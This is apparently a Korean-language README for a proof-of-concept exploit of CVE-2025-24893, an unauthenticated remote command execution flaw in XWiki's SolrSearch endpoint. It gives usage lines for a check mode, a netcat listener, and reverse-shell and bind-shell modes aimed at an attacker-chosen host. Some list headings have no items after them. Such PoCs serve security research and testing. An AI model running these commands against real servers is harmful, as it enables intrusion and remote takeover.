
CVE-2025-24893에 대한 개념 증명: 안전하지 않은 서버 측 템플릿 평가를 통한 XWiki에서의 인증되지 않은 원격 명령 실행을 시연합니다.
이 저장소는 XWiki에 영향을 미치는 인증되지 않은 원격 명령 실행(RCE) 취약점인 CVE-2025-24893에 대한 **통제된 개념 증명(PoC)**을 포함하고 있습니다.
이 취약점은 안전하지 않은 서버 측 템플릿 및 스크립트 평가로 인해 공격자가 서버에서 임의의 운영 체제 명령을 실행할 수 있도록 합니다.
XWiki는 일반적으로 다음과 같은 용도로 사용되는 오픈소스 엔터프라이즈 위키 플랫폼입니다:
XWiki는 인터넷에 노출된 서버에 자주 배포되므로 요청 처리 및 스크립팅 로직의 보안 취약점은 실제 환경에서 큰 영향을 미칠 수 있습니다.
SolrSearch 엔드포인트에 전달된 사용자 제어 입력이 Groovy 스크립팅 엔진에 의해 부적절하게 검증되고 평가되었습니다. 이로 인해 공격자가 제공한 입력이 실행 가능한 서버 측 코드로 해석되어 호스트 시스템에서 명령이 실행될 수 있었습니다.
이 PoC는 다음을 시연합니다:
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearch 엔드포인트로 전송됩니다.이 프로젝트는 교육 목적 및 승인된 보안 테스트를 위해서만 제공됩니다.
명시적 허가 없이 시스템에 대해 이 코드를 무단으로 사용하는 것은 금지됩니다.
이 저장소는 다음을 시연하기 위해 생성되었습니다: